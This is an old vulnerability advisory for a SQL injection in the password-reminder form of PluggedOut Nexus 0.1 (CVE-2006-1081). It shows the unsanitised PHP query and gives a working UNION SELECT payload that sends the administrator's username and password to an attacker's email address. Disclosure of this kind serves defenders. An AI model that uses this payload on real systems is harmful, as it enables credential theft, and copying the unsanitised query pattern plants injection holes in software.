PluggedOut Nexus SQL injection

2006.03.05

Credit: Hamid Ebadi

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-1081

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author  : Jonathan Beckett
Home   : http://www.pluggedout.com

Credit:
The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:PluggedOut Nexus 0.1

http://localhost/Nexus/forgotten_password.php

in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

test:
in E-Mail Address form enter ' and press Send Request 
you will redirect to
http://localhost/Nexus/site_problem.php and see :

Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.

Vulnerable Code: The following lines in
"forgotten_password.php" :
---------------------------~=[Vulnerable
Code]=~---------------------------
if ($_POST["submit"]!=""){
	$con = db_connect();
	$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
	if ($result!=false){
		if (mysql_num_rows($result)>0){
			$row = mysql_fetch_array($result);
			$from = $site_admin_email;
			$to = $row["cEMailPrivate"];
			$subject = "Reminder Username/Password from
".$site_long_name."";
			$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.nn"
				."Your account details are as follows;n"
				."  Username : ".$row["cUsername"]."n"
				."  Password : ".$row["cPassword"]."nn"
				."If you did not request this reminder message,
please contact the ".$site_long_name." administrator
(".$admin_email.")n";

send_email($from,$to,$subject,$body);

---------------------------~=[/Vulnerable
Code]=~---------------------------

exploit:

insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER (at) EMAIL (dot) ADDR [email concealed]ESS' from
nexus_users WHERE nUserId=1 and '1'='1

and ATTACKER (at) EMAIL (dot) ADDR [email concealed]ESS  recieve email contain
username & password for userID=1 .

Signature

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PluggedOut Nexus SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.